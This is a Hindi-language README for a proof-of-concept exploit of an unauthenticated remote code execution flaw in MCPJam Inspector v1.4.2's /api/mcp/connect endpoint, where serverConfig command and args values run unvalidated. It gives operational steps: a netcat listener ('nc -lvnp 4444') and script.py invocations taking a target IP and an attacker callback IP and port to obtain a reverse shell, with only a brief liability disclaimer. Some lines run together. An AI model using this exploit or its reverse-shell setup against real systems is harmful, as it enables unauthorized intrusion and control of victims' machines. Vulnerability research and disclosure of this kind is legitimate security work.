
यह उपयोगिता MCPJam v1.4.2 से संबंधित शोध के दौरान बनाई गई थी। एप्लिकेशन एक API एंडपॉइंट को उजागर करता है जो एक सर्वर कॉन्फ़िगरेशन ऑब्जेक्ट को स्वीकार करता है। कुछ शर्तों के तहत, अपर्याप्त सत्यापन अनपेक्षित कमांड निष्पादन की अनुमति दे सकता है।
MCPJam Inspector में /api/mcp/connect एंडपॉइंट पर एक अनप्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता मौजूद है। यह भेद्यता हमलावरों को एक दुर्भावनापूर्ण MCP सर्वर कॉन्फ़िगरेशन पेलोड भेजकर मनमाने कमांड निष्पादित करने की अनुमति देती है।
यह एंडपॉइंट एक serverConfig ऑब्जेक्ट के साथ JSON पेलोड स्वीकार करता है, जिसमें command और args ऐरे होते हैं, जो उचित सत्यापन या सैनिटाइज़ेशन के बिना सीधे सिस्टम पर निष्पादित होते हैं।
requests लाइब्रेरी: pip install requestsnetcat या socatटर्मिनल 1 - श्रवणकर्ता प्रारंभ करें:
nc -lvnp 4444
टर्मिनल 2 - शोषण चलाएं:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# डिफ़ॉल्ट (पोर्ट 6274, कॉलबैक पोर्ट 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# कस्टम MCPJam पोर्ट
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# कस्टम श्रवणकर्ता पोर्ट
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect एंडपॉइंट पर भेजता है⚠️ अस्वीकरण:
यह शोषण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। उपयोगकर्ता पूरी तरह से जिम्मेदार हैं:
लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई दायित्व नहीं मानता है। अपने जोखिम पर उपयोग करें।
/api/mcp/connect